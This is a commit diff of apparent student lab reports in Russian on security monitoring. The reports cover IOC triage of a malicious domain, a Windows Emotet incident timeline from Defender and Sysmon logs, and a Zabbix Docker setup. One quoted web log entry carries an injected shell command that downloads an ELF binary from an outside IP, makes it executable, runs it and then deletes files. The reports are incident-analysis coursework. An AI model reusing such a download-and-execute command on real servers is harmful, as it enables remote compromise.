Compare commits
5 Commits
4db4c0d57a
...
bad
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
ac8e716774 | ||
| 6f9b58b500 | |||
|
|
40899bcd4b | ||
|
|
37b5fd1f40 | ||
|
|
63205dd718 |
42
01-main/02-monitoring/01-intro/README.md
Normal file
@@ -0,0 +1,42 @@
|
|||||||
|
# Задание 1
|
||||||
|
|
||||||
|
Согласно найденным отчётам по хостнейму и IP-адресу:
|
||||||
|
|
||||||
|
https://any.run/report/6dd737167202586feffdf37f3883461de94a1c01051a32b30db66fc1db5a681d/11691868-8155-4601-9cc5-ebdd94a77b79
|
||||||
|
https://otx.alienvault.com/indicator/ip/103.53.42.223
|
||||||
|
|
||||||
|
Данный домен скорее всего участвовал в рассылке вредоносных файлов.
|
||||||
|
|
||||||
|
1. В список IOC можно предложить указать хэши вредоносных файлов, связанных с данным доменом, например:
|
||||||
|
|
||||||
|
```
|
||||||
|
bae8ebd43fe0bc8c5bce6d5b8986589434e434b9a0023c7f535e6269858e4d7d
|
||||||
|
6DD737167202586FEFFDF37F3883461DE94A1C01051A32B30DB66FC1DB5A681D
|
||||||
|
fde3341015c7de7383bca14b2e62336bd685f1abc4105ad5d4eba6d13da09f15
|
||||||
|
65f81879b5421a5683de158629677f153d046ce7dc81fb770d3b2ca9cbd8d47f
|
||||||
|
17d1bbe4053498d4a7db1eda9e477d7d86b1b538afa4b9a9f7579676459c17c4
|
||||||
|
b963fdcb37b1ea21efd4d930112e3e7636d16160699eaa09d4e1e23a2f12f00a
|
||||||
|
```
|
||||||
|
|
||||||
|
Также можно добавить IP-адрес данного домена, так как взломан может целый почтовый сервис, который хостит множество почтовых доменов (103.53.42.223)
|
||||||
|
|
||||||
|
Дополнительно, можно предположить, что сайт хостится на сервисе (*.webhostbox.net), все поддомены можно также добавить в список IOC.
|
||||||
|
|
||||||
|
2. Сам хост по совокупности не похож на зараженный в привычном понимании (родительский домен в каких-либо базах вредоносов не находится), вероятнее всего был взломан почтовый сервер и хоста (в отчетах имеются даже учетные данные, с помощью которых проводилась рассылка), после чего он использовался для спам рассылок вредоносных файлов (значатся различные семейства Trojan и шифровальщиков, например AgentTesla, ZeuS) с других уже зараженных машин.
|
||||||
|
|
||||||
|
# Задание 2
|
||||||
|
|
||||||
|
Самым важным моментом логов можно считать следующую запись:
|
||||||
|
```
|
||||||
|
47.243.78.78 - - [21/Oct/2022:00:33:56 +0300] "GET /vendor/htmlawed/htmlawed/233.php?123456=rm%20-f%20linux*;wget%20http://67.198.237.116/linux_x86;curl%20-O%20http://67.198.237.116/linux_x86;chmod%20777%20*;./linux_x86;rm%20-f%20linux_x86.*;rm%20-f%20md*;rm%20-f%20x* HTTP/1.1" 200 5800 "-" "python-requests/2.27.1"
|
||||||
|
```
|
||||||
|
Это запрос с User-agent "python-requests/2.27.1" возвративший 200 ответ.
|
||||||
|
User-agent python-requests говорит о том, что данный запрос вероятно создан с помощью библиотеки Python. А 200 ответ говорит, что сервер вернул некое содержимое и отработал запрос. А куча bash-команд в запросе говорит нам о вероятной эксплуатации атаки типа PHP-Injection (https://owasp.org/www-community/attacks/Code_Injection)
|
||||||
|
|
||||||
|
1. ELF-файл скорее всего скачивается с помощью wget с хоста http://67.198.237.116, после чего происходит выдача ему привилегий (chmod) и запуск (./linux_x86)
|
||||||
|
|
||||||
|
Имя elf-файла -- linux_x86.
|
||||||
|
|
||||||
|
2. Вероятнее всего с активностью ассоциируется уязвимость CVE-2022-35914 (https://nvd.nist.gov/vuln/detail/CVE-2022-35914). Понять это можно по пути до скрипта в запросе (/vendor/htmlawed/htmlawed/233.php), при этом в уязвимости описывается эксплуатация через POST-запрос и другое имя уязвимого скрипта, так что можно предположить, что 233.php уже является PHP-шеллом, загруженным на уязвимый сервер в результате эксплуатации.
|
||||||
|
|
||||||
|
Итоговый ответ (по форме: имя ELF-файла (слитно), CVE-идентификатор уязвимости (слитно)): linux_x86, CVE-2022-35914
|
||||||
402
01-main/02-monitoring/02-logs/README.md
Normal file
@@ -0,0 +1,402 @@
|
|||||||
|
# Мониторинг, аналитика и оценка рисков ИБ
|
||||||
|
## Модуль 2. Аналитика информационной безопасности
|
||||||
|
### Практическое задание № 3
|
||||||
|
#### Ход задания
|
||||||
|
|
||||||
|
Условие:
|
||||||
|
```
|
||||||
|
Представим кейс. Сотрудница в 00:06 12.03 обнаружила на своем компьютере что-то странное с файлами. Она выключила компьютер, а утром обратилась к вашей команде расследования. Проведите расследование инцидента по логам с ОС Windows.
|
||||||
|
|
||||||
|
В качестве результата составьте таймлайн инцидента 12-17 событий с хоста. В таймлайне важно отразить развитие инцидента, временные метки событий, EventID, влияние инцидента, какая вредоносная активность наблюдается (подозрительные сетевые соединения, изменения реестра Windows и т.д.). Рекомендуется воспользоваться рекомендациями по журналам Windows с семинара. Особенно ценно и достаточно непросто определить источник попадания активности на рабочую станцию, понять, как начался инцидент (время, содержание).
|
||||||
|
```
|
||||||
|
|
||||||
|
Рассмотрим логи и выделим основные моменты.
|
||||||
|
|
||||||
|
1. Сработка антивируса MS Defender на документ `╨Ф╨╛╨│╨╛╨▓╨╛╤А.doc`
|
||||||
|
```json
|
||||||
|
{
|
||||||
|
"Timestamp": "2024-03-11 22:42:25.843 +00:00",
|
||||||
|
"RuleTitle": "Defender Alert (Severe)",
|
||||||
|
"Level": "crit",
|
||||||
|
"Computer": "test-win-19-res",
|
||||||
|
"Channel": "Defender",
|
||||||
|
"EventID": 1116,
|
||||||
|
"RecordID": 337,
|
||||||
|
"Details": {
|
||||||
|
"Threat": "TrojanDownloader:O97M/Emotet.CSK!MTB",
|
||||||
|
"Severity": "Критический",
|
||||||
|
"Type": "Загрузчик троянов",
|
||||||
|
"User": "TEST-WIN-19-RES\\Admin",
|
||||||
|
"Path": "file:_C:\\Users\\Admin\\Downloads\\╨Ф╨╛╨│╨╛╨▓╨╛╤А.doc",
|
||||||
|
"Proc": "C:\\Windows\\explorer.exe"
|
||||||
|
},
|
||||||
|
"ExtraFieldInfo": {
|
||||||
|
"Action ID": 9,
|
||||||
|
"Action Name": "%%887",
|
||||||
|
"Additional Actions ID": 0,
|
||||||
|
"Additional Actions String": "No additional actions required",
|
||||||
|
"Category ID": 4,
|
||||||
|
"Detection ID": "{0F657BB1-4CC8-4145-AF21-F8E170AD73F6}",
|
||||||
|
"Detection Time": "2024-03-11T22:42:25.211Z",
|
||||||
|
"Engine Version": "AM: 1.1.24010.10, NIS: 2.1.14600.4",
|
||||||
|
"Error Code": "0x00000000",
|
||||||
|
"Error Description": "Операция успешно завершена.",
|
||||||
|
"Execution ID": 1,
|
||||||
|
"Execution Name": "%%813",
|
||||||
|
"FWLink": "http://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDownloader:O97M/Emotet.CSK!MTB&threatid=2147761122&enterprise=0",
|
||||||
|
"Origin ID": 1,
|
||||||
|
"Origin Name": "%%845",
|
||||||
|
"Post Clean Status": 0,
|
||||||
|
"Pre Execution Status": 0,
|
||||||
|
"Product Name": "%%827",
|
||||||
|
"Product Version": "4.10.14393.4651",
|
||||||
|
"Remediation User": "",
|
||||||
|
"Severity ID": 5,
|
||||||
|
"Signature Version": "AV: 1.405.1159.0, AS: 1.405.1159.0, NIS: 119.0.0.0",
|
||||||
|
"Source ID": 4,
|
||||||
|
"Source Name": "%%819",
|
||||||
|
"State": 1,
|
||||||
|
"Status Code": 1,
|
||||||
|
"Status Description": "",
|
||||||
|
"Threat ID": 2147761122,
|
||||||
|
"Type ID": 0,
|
||||||
|
"Type Name": "%%822",
|
||||||
|
"Unused2": "",
|
||||||
|
"Unused3": "",
|
||||||
|
"Unused4": "",
|
||||||
|
"Unused5": "",
|
||||||
|
"Unused6": "",
|
||||||
|
"Unused": ""
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
2. Отключение защитных механизмов MS Defender
|
||||||
|
|
||||||
|
```json
|
||||||
|
{
|
||||||
|
"Timestamp": "2024-03-11 22:44:13.718 +00:00",
|
||||||
|
"RuleTitle": "Windows Defender Real-time Protection Disabled",
|
||||||
|
"Level": "high",
|
||||||
|
"Computer": "test-win-19-res",
|
||||||
|
"Channel": "Defender",
|
||||||
|
"EventID": 5001,
|
||||||
|
"RecordID": 342,
|
||||||
|
"Details": {
|
||||||
|
},
|
||||||
|
"ExtraFieldInfo": {
|
||||||
|
"Product Name": "%%827",
|
||||||
|
"Product Version": "4.10.14393.4651"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
3. Очистка журналов Windows
|
||||||
|
```json
|
||||||
|
{
|
||||||
|
"Timestamp": "2024-03-11 23:34:34.485 +00:00",
|
||||||
|
"RuleTitle": "Log Cleared",
|
||||||
|
"Level": "high",
|
||||||
|
"Computer": "test-win-19-res",
|
||||||
|
"Channel": "Sec",
|
||||||
|
"EventID": 1102,
|
||||||
|
"RecordID": 79373,
|
||||||
|
"Details": {
|
||||||
|
},
|
||||||
|
"ExtraFieldInfo": {
|
||||||
|
"SubjectDomainName": "TEST-WIN-19-RES",
|
||||||
|
"SubjectLogonId": "0xc285d",
|
||||||
|
"SubjectUserName": "Admin",
|
||||||
|
"SubjectUserSid": "S-1-5-21-107221567-3081071120-1500011723-1000"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
4. Начинаются постоянные подключения на порт RDP
|
||||||
|
|
||||||
|
```json
|
||||||
|
{
|
||||||
|
"Timestamp": "2024-03-11 23:34:06.469 +00:00",
|
||||||
|
"RuleTitle": "Net Conn (Sysmon Alert)",
|
||||||
|
"Level": "med",
|
||||||
|
"Computer": "test-win-19-res",
|
||||||
|
"Channel": "Sysmon",
|
||||||
|
"EventID": 3,
|
||||||
|
"RecordID": 2321153,
|
||||||
|
"Details": {
|
||||||
|
"Initiated": false,
|
||||||
|
"Proto": "tcp",
|
||||||
|
"SrcIP": "45.141.87.101",
|
||||||
|
"SrcPort": 7028,
|
||||||
|
"SrcHost": "-",
|
||||||
|
"TgtIP": "212.233.73.226",
|
||||||
|
"TgtPort": 3389,
|
||||||
|
"TgtHost": "test-win-19-res",
|
||||||
|
"User": "NT AUTHORITY\\NETWORK SERVICE",
|
||||||
|
"Proc": "C:\\Windows\\System32\\svchost.exe",
|
||||||
|
"PID": 852,
|
||||||
|
"PGUID": "13CA83BD-C3D1-65ED-1100-000000000D00"
|
||||||
|
},
|
||||||
|
"ExtraFieldInfo": {
|
||||||
|
"DestinationPortName": "ms-wbt-server",
|
||||||
|
"RuleName": "RDP",
|
||||||
|
"UtcTime": "2024-03-12 02:33:54.284"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
5. Скачивание с помощью браузера файла письма `Договоры.eml`
|
||||||
|
```json
|
||||||
|
{
|
||||||
|
"Timestamp": "2024-03-11 23:40:06.167 +00:00",
|
||||||
|
"RuleTitle": "ADS Created",
|
||||||
|
"Level": "info",
|
||||||
|
"Computer": "test-win-19-res",
|
||||||
|
"Channel": "Sysmon",
|
||||||
|
"EventID": 15,
|
||||||
|
"RecordID": 2321344,
|
||||||
|
"Details": {
|
||||||
|
"Path": "C:\\Users\\Admin\\Downloads\\Договоры.eml",
|
||||||
|
"Proc": "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe",
|
||||||
|
"PID": 3040,
|
||||||
|
"PGUID": "13CA83BD-952E-65EF-3607-000000000D00",
|
||||||
|
"Hash": "MD5=4A509F71EEEA143D38DF7F76446E2CB3,SHA256=CA1E2C445D4C847B161D36E9939CFA66B5C71A7549C76988D948314691A5DD79,IMPHASH=00000000000000000000000000000000"
|
||||||
|
},
|
||||||
|
"ExtraFieldInfo": {
|
||||||
|
"Contents": "-",
|
||||||
|
"CreationUtcTime": "2024-03-11 23:40:00.237",
|
||||||
|
"RuleName": "-",
|
||||||
|
"User": "TEST-WIN-19-RES\\Admin",
|
||||||
|
"UtcTime": "2024-03-11 23:40:06.027"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
6. Скачивание с помощью браузера архива
|
||||||
|
|
||||||
|
```
|
||||||
|
{
|
||||||
|
"Timestamp": "2024-03-11 23:40:06.672 +00:00",
|
||||||
|
"RuleTitle": "File Created (Sysmon Alert)",
|
||||||
|
"Level": "med",
|
||||||
|
"Computer": "test-win-19-res",
|
||||||
|
"Channel": "Sysmon",
|
||||||
|
"EventID": 11,
|
||||||
|
"RecordID": 2321347,
|
||||||
|
"Details": {
|
||||||
|
"Rule": "Downloads",
|
||||||
|
"Path": "C:\\Users\\Admin\\Downloads\\3vs2BYCX.zip.part",
|
||||||
|
"Proc": "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe",
|
||||||
|
"PID": 3040,
|
||||||
|
"PGUID": "13CA83BD-952E-65EF-3607-000000000D00"
|
||||||
|
},
|
||||||
|
"ExtraFieldInfo": {
|
||||||
|
"CreationUtcTime": "2024-03-11 23:40:06.659",
|
||||||
|
"User": "TEST-WIN-19-RES\\Admin",
|
||||||
|
"UtcTime": "2024-03-11 23:40:06.659"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
7. Скачивание с помощью бразуера архива `Docs.zip`
|
||||||
|
```json
|
||||||
|
{
|
||||||
|
"Timestamp": "2024-03-11 23:40:06.847 +00:00",
|
||||||
|
"RuleTitle": "File Created (Sysmon Alert)",
|
||||||
|
"Level": "med",
|
||||||
|
"Computer": "test-win-19-res",
|
||||||
|
"Channel": "Sysmon",
|
||||||
|
"EventID": 11,
|
||||||
|
"RecordID": 2321351,
|
||||||
|
"Details": {
|
||||||
|
"Rule": "Downloads",
|
||||||
|
"Path": "C:\\Users\\Admin\\Downloads\\Docs.zip:Zone.Identifier",
|
||||||
|
"Proc": "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe",
|
||||||
|
"PID": 3040,
|
||||||
|
"PGUID": "13CA83BD-952E-65EF-3607-000000000D00"
|
||||||
|
},
|
||||||
|
"ExtraFieldInfo": {
|
||||||
|
"CreationUtcTime": "2024-03-11 23:40:06.659",
|
||||||
|
"User": "TEST-WIN-19-RES\\Admin",
|
||||||
|
"UtcTime": "2024-03-11 23:40:06.843"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
8. Перемещение файла в `C:\\Users\\Admin\\Desktop\\Work\\╨Ф╨╛╨│╨╛╨▓╨╛╤А.doc`
|
||||||
|
|
||||||
|
```json
|
||||||
|
{
|
||||||
|
"Timestamp": "2024-03-11 23:48:26.520 +00:00",
|
||||||
|
"RuleTitle": "ADS Created",
|
||||||
|
"Level": "info",
|
||||||
|
"Computer": "test-win-19-res",
|
||||||
|
"Channel": "Sysmon",
|
||||||
|
"EventID": 15,
|
||||||
|
"RecordID": 2321544,
|
||||||
|
"Details": {
|
||||||
|
"Path": "C:\\Users\\Admin\\Desktop\\Work\\╨Ф╨╛╨│╨╛╨▓╨╛╤А.doc",
|
||||||
|
"Proc": "C:\\Windows\\Explorer.EXE",
|
||||||
|
"PID": 3484,
|
||||||
|
"PGUID": "13CA83BD-9B68-65ED-6000-000000000D00",
|
||||||
|
"Hash": "MD5=D7E6921BFD008F707BA52DEE374FF3DB,SHA256=044AA7E93EC81B297B53AAEBAD9BBAC1A9D754219B001AAF5D4261665AF30BC7,IMPHASH=00000000000000000000000000000000"
|
||||||
|
},
|
||||||
|
"ExtraFieldInfo": {
|
||||||
|
"Contents": "-",
|
||||||
|
"CreationUtcTime": "2024-03-11 20:44:02.000",
|
||||||
|
"RuleName": "-",
|
||||||
|
"User": "TEST-WIN-19-RES\\Admin",
|
||||||
|
"UtcTime": "2024-03-11 23:48:26.509"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
9. Перемещение файла в `C:\\Users\\Admin\\Desktop\\Work\\╨Ф╨╛╨│╨╛╨▓╨╛╤А2.doc`
|
||||||
|
|
||||||
|
```json
|
||||||
|
{
|
||||||
|
"Timestamp": "2024-03-11 23:48:26.540 +00:00",
|
||||||
|
"RuleTitle": "ADS Created",
|
||||||
|
"Level": "info",
|
||||||
|
"Computer": "test-win-19-res",
|
||||||
|
"Channel": "Sysmon",
|
||||||
|
"EventID": 15,
|
||||||
|
"RecordID": 2321545,
|
||||||
|
"Details": {
|
||||||
|
"Path": "C:\\Users\\Admin\\Desktop\\Work\\╨Ф╨╛╨│╨╛╨▓╨╛╤А2.doc",
|
||||||
|
"Proc": "C:\\Windows\\Explorer.EXE",
|
||||||
|
"PID": 3484,
|
||||||
|
"PGUID": "13CA83BD-9B68-65ED-6000-000000000D00",
|
||||||
|
"Hash": "MD5=349D13CA99AB03869548D75B99E5A1D0,SHA256=D34849E1C97F9E615B3A9B800CA1F11ED04A92B1014F55AA0158E3FFFC22D78F,IMPHASH=00000000000000000000000000000000"
|
||||||
|
},
|
||||||
|
"ExtraFieldInfo": {
|
||||||
|
"Contents": "-",
|
||||||
|
"CreationUtcTime": "2024-03-11 20:49:58.000",
|
||||||
|
"RuleName": "-",
|
||||||
|
"User": "TEST-WIN-19-RES\\Admin",
|
||||||
|
"UtcTime": "2024-03-11 23:48:26.525"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
10. Открытие файла `╨Ф╨╛╨│╨╛╨▓╨╛╤А.doc` в Word.
|
||||||
|
```json
|
||||||
|
{
|
||||||
|
"Timestamp": "2024-03-11 23:50:54.755 +00:00",
|
||||||
|
"RuleTitle": "Proc Exec",
|
||||||
|
"Level": "info",
|
||||||
|
"Computer": "test-win-19-res",
|
||||||
|
"Channel": "Sec",
|
||||||
|
"EventID": 4688,
|
||||||
|
"RecordID": 79425,
|
||||||
|
"Details": {
|
||||||
|
"Cmdline": "\"C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\" /n \"C:\\Users\\Admin\\Desktop\\Work\\╨Ф╨╛╨│╨╛╨▓╨╛╤А.doc\" /o \"\"",
|
||||||
|
"Proc": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
|
||||||
|
"PID": 1360,
|
||||||
|
"User": "Admin",
|
||||||
|
"LID": "0xc285d"
|
||||||
|
},
|
||||||
|
"ExtraFieldInfo": {
|
||||||
|
"MandatoryLabel": "HIGH_INTEGRITY",
|
||||||
|
"ParentProcessName": "C:\\Windows\\explorer.exe",
|
||||||
|
"ProcessId": 3484,
|
||||||
|
"SubjectDomainName": "TEST-WIN-19-RES",
|
||||||
|
"SubjectUserSid": "S-1-5-21-107221567-3081071120-1500011723-1000",
|
||||||
|
"TargetDomainName": "-",
|
||||||
|
"TargetLogonId": "0x0",
|
||||||
|
"TargetUserName": "-",
|
||||||
|
"TargetUserSid": "S-1-0-0",
|
||||||
|
"TokenElevationType": "FULL_TOKEN"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
11. Дано разрешение на исполнение макросов Office.
|
||||||
|
|
||||||
|
```json
|
||||||
|
|
||||||
|
{
|
||||||
|
"Timestamp": "2024-03-11 23:52:19.327 +00:00",
|
||||||
|
"RuleTitle": "Reg Key Value Set (Sysmon Alert)",
|
||||||
|
"Level": "med",
|
||||||
|
"Computer": "test-win-19-res",
|
||||||
|
"Channel": "Sysmon",
|
||||||
|
"EventID": 13,
|
||||||
|
"RecordID": 2321663,
|
||||||
|
"Details": {
|
||||||
|
"Rule": "Context,ProtectedModeExitOrMacrosUsed",
|
||||||
|
"EventType": "SetValue",
|
||||||
|
"TgtObj": "HKU\\S-1-5-21-107221567-3081071120-1500011723-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Word\\Security\\Trusted Documents\\TrustRecords\\%USERPROFILE%/Desktop/Work/╨Ф╨╛╨│╨╛╨▓╨╛╤А.doc",
|
||||||
|
"": "Binary Data",
|
||||||
|
"Proc": "C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE",
|
||||||
|
"PID": 1360,
|
||||||
|
"PGUID": "13CA83BD-98DE-65EF-4E07-000000000D00"
|
||||||
|
},
|
||||||
|
"ExtraFieldInfo": {
|
||||||
|
"User": "TEST-WIN-19-RES\\Admin",
|
||||||
|
"UtcTime": "2024-03-11 23:52:19.314"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
12. Спустя 17 секунд пользователь решил посмотреть новые тик-токи.
|
||||||
|
|
||||||
|
```json
|
||||||
|
{
|
||||||
|
"Timestamp": "2024-03-11 23:52:36.757 +00:00",
|
||||||
|
"RuleTitle": "DNS Query",
|
||||||
|
"Level": "info",
|
||||||
|
"Computer": "test-win-19-res",
|
||||||
|
"Channel": "Sysmon",
|
||||||
|
"EventID": 22,
|
||||||
|
"RecordID": 2321690,
|
||||||
|
"Details": {
|
||||||
|
"Query": "analytics.tiktok.com",
|
||||||
|
"Result": "type: 5 analytics.tiktok.com.ttdns2.com;type: 5 analytics.tiktok.com.edgekey.net;type: 5 e35058.a.akamaiedge.net;::ffff:139.45.207.83;::ffff:139.45.207.18;::ffff:139.45.207.81;::ffff:139.45.207.10;::ffff:139.45.207.48;::ffff:139.45.207.72;::ffff:139.45.207.11;::ffff:139.45.207.32;::ffff:139.45.207.97;",
|
||||||
|
"Proc": "C:\\Program Files\\Internet Explorer\\iexplore.exe",
|
||||||
|
"PID": 5344,
|
||||||
|
"PGUID": "13CA83BD-9936-65EF-5B07-000000000D00"
|
||||||
|
},
|
||||||
|
"ExtraFieldInfo": {
|
||||||
|
"QueryStatus": 0,
|
||||||
|
"RuleName": "-",
|
||||||
|
"User": "TEST-WIN-19-RES\\Admin",
|
||||||
|
"UtcTime": "2024-03-11 23:52:25.873"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
13. Наблюдаются ошибки записи на диск.
|
||||||
|
```json
|
||||||
|
{
|
||||||
|
"Timestamp": "2024-03-12 00:18:44.457 +00:00",
|
||||||
|
"RuleTitle": "Sysmon Error",
|
||||||
|
"Level": "low",
|
||||||
|
"Computer": "test-win-19-res",
|
||||||
|
"Channel": "Sysmon",
|
||||||
|
"EventID": 255,
|
||||||
|
"RecordID": 2322478,
|
||||||
|
"Details": {
|
||||||
|
"ID": "GetConfigurationOptions",
|
||||||
|
"Description": "Failed to open service configuration with error 19 - Last error: Носитель защищен от записи.\\r\\n"
|
||||||
|
},
|
||||||
|
"ExtraFieldInfo": {
|
||||||
|
"Description": "Failed to open service configuration with error 19 - Last error: Носитель защищен от записи.",
|
||||||
|
"UtcTime": "2024-03-12 00:18:44.437"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Итог лабораторной работы
|
||||||
|
|
||||||
|
В итоге мы получили следующую историю, пользователь работая по RDP попробовал перенести на компьютер вредоносный файл Word, который был заблокирован антивирусом Microsoft Defender.
|
||||||
|
После чего он отключил антивирус и очистил журналы Windows. После этого через браузер Firefox был скачан файл письма, в котором находилось вложение в виде архива `.zip`. Данный архив был разархивирован.
|
||||||
|
После этого пользователь открыл вредоносный документ, разрешил взаимодействие с ним и дополнительно разрешил выполнение макросов. Через 17 секунд пользователь окончательно усыпил бдительность и пошёл смотреть тик-токи перед сном.
|
||||||
|
На следующий день пользователь обнаружил, что имеет проблему.
|
||||||
|
|
||||||
|
Вероятнее всего в документе содержался зловред бьющий файлы на диске или же шифрующий их. Механизм был активирован в тот момент, когда пользователь разрешил исполнение макросов в документе.
|
||||||
|
|
||||||
|
Также мы заметили большое количество подключений по RDP с разных источников, в том числе ботнетов, замеченных в брутфорсах RDP. С данной проблемой связи это не имеет.
|
||||||
|
|
||||||
|
В дальнейшем стоит использовать антивирус, который имеет возможность ограничения его отключения или добавления исключений. (или же групповые политики Windows) запретить выполнение макросов в Office и настроить ограничение сетевого доступа с помощью межсетевого экрана (используя UTM с прокси сервером в составе, мы также получим возможность заблокировать пользователю возможность смотреть тик-токи на рабочем месте, чтобы не расслаблялся).
|
||||||
|
**Выполнил:** Харитонов Марат Русланович, М235314
|
||||||
168
01-main/02-monitoring/03-monitoring/README.md
Normal file
@@ -0,0 +1,168 @@
|
|||||||
|
# Модуль 3. Мониторинг информационной безопасности и оценка рисков
|
||||||
|
## Мониторинг, аналитика и оценка рисков ИБ. Задание 4
|
||||||
|
### Ход лабораторной работы
|
||||||
|
#### Развертывание Zabbix
|
||||||
|
1. Для развертывания Zabbix воспользуемся официальной документацией, в части касающейся использования Docker-контейнера для развертывания.
|
||||||
|
|
||||||
|
```
|
||||||
|
https://www.zabbix.com/documentation/current/en/manual/installation/containers
|
||||||
|
https://github.com/zabbix/zabbix-docker
|
||||||
|
```
|
||||||
|
|
||||||
|
2. Сформируем docker-compose.yaml, запустим его и убедимся в старте сервисов
|
||||||
|
|
||||||
|
```yaml
|
||||||
|
version: '3.5'
|
||||||
|
services:
|
||||||
|
server:
|
||||||
|
image: zabbix/zabbix-server-pgsql:alpine-latest
|
||||||
|
ports:
|
||||||
|
- "10051:10051"
|
||||||
|
volumes:
|
||||||
|
- /etc/localtime:/etc/localtime
|
||||||
|
- /etc/timezone:/etc/timezone
|
||||||
|
restart: always
|
||||||
|
depends_on:
|
||||||
|
- postgres-server
|
||||||
|
environment:
|
||||||
|
- POSTGRES_USER=zabbix
|
||||||
|
- POSTGRES_PASSWORD=zabbix
|
||||||
|
- POSTGRES_DB=zabbixNew
|
||||||
|
- ZBX_HISTORYSTORAGETYPES=log,text #Zabbix configuration variables
|
||||||
|
- ZBX_DEBUGLEVEL=1
|
||||||
|
- ZBX_HOUSEKEEPINGFREQUENCY=1
|
||||||
|
- ZBX_MAXHOUSEKEEPERDELETE=5000
|
||||||
|
- ZBX_PROXYCONFIGFREQUENCY=3600
|
||||||
|
web-nginx-pgsql:
|
||||||
|
image: zabbix/zabbix-web-nginx-pgsql:alpine-latest
|
||||||
|
ports:
|
||||||
|
- "80:8080"
|
||||||
|
- "443:8443"
|
||||||
|
volumes:
|
||||||
|
- /etc/localtime:/etc/localtime
|
||||||
|
- /etc/timezone:/etc/timezone
|
||||||
|
- /etc/ssl/nginx:/etc/ssl/nginx
|
||||||
|
healthcheck:
|
||||||
|
test: ["CMD", "curl", "-f", "http://localhost:8080/"]
|
||||||
|
interval: 10s
|
||||||
|
timeout: 5s
|
||||||
|
retries: 3
|
||||||
|
start_period: 30s
|
||||||
|
sysctls:
|
||||||
|
- net.core.somaxconn=65535
|
||||||
|
restart: always
|
||||||
|
depends_on:
|
||||||
|
- server
|
||||||
|
- postgres-server
|
||||||
|
environment:
|
||||||
|
- POSTGRES_USER=zabbix
|
||||||
|
- POSTGRES_PASSWORD=zabbix
|
||||||
|
- POSTGRES_DB=zabbixNew
|
||||||
|
- ZBX_SERVER_HOST=server
|
||||||
|
- ZBX_POSTMAXSIZE=64M
|
||||||
|
- PHP_TZ=Europe/Moscow
|
||||||
|
- ZBX_MAXEXECUTIONTIME=500
|
||||||
|
agent:
|
||||||
|
image: zabbix/zabbix-agent:alpine-latest
|
||||||
|
ports:
|
||||||
|
- "10050:10050"
|
||||||
|
volumes:
|
||||||
|
- /etc/localtime:/etc/localtime
|
||||||
|
- /etc/timezone:/etc/timezone
|
||||||
|
- /proc:/proc
|
||||||
|
- /sys:/sys
|
||||||
|
- /dev:/dev
|
||||||
|
- /var/run/docker.sock:/var/run/docker.sock
|
||||||
|
privileged: true
|
||||||
|
pid: "host"
|
||||||
|
restart: always
|
||||||
|
depends_on:
|
||||||
|
- server
|
||||||
|
environment:
|
||||||
|
- ZBX_SERVER_HOST=server
|
||||||
|
|
||||||
|
postgres-server:
|
||||||
|
image: postgres:16.2
|
||||||
|
restart: always
|
||||||
|
volumes:
|
||||||
|
- pg_data:/var/lib/postgresql/data
|
||||||
|
environment:
|
||||||
|
- POSTGRES_PASSWORD=zabbix
|
||||||
|
- POSTGRES_USER=zabbix
|
||||||
|
- POSTGRES_DB=zabbixNew
|
||||||
|
volumes:
|
||||||
|
pg_data:
|
||||||
|
```
|
||||||
|

|
||||||
|
|
||||||
|
3. Проверим веб-интерфейс на наличие запущенного Zabbix
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
Zabbix развернут, можно приступать к работе.
|
||||||
|
|
||||||
|
4. Войдём в Zabbix с использованием учетных данных `Admin/zabbix`
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
Тут мы видим, что у нас уже имеется один хост, который сообщает о проблеме. Это уведомление о недоступности агента самого Zabbix-сервера, который был развернут в контейнере `agent` (в соответствии с docker-compose файлом)
|
||||||
|
|
||||||
|
5. Исправим эту проблему, для этого перейдем в настройки данного хоста и установим его опрос с помощью Zabbix-агента через DNS имя, вместо IP-адреса.
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
6. Спустя пару секунд мы наблюдаем, что связность появилась.
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
7. Дополнительно создадим ещё одно устройство, это будет мой маршрутизатор Mikrotik. В качестве интерфейса подключения назначим SNMP.
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
8. Добавим 2 элемента данных:
|
||||||
|
|
||||||
|
Проверку доступности по ICMP:
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
Текущий аптайм в милисекундах:
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
#### Создание кастомных дашбордов
|
||||||
|
|
||||||
|
1. Приступим к созданию своего дашборда с мониторингом интересующих нас параметров.
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
2. Добавим виджет доступности узлов сети
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
3. Добавим виджет с информацией об Uptime Mikrotik.
|
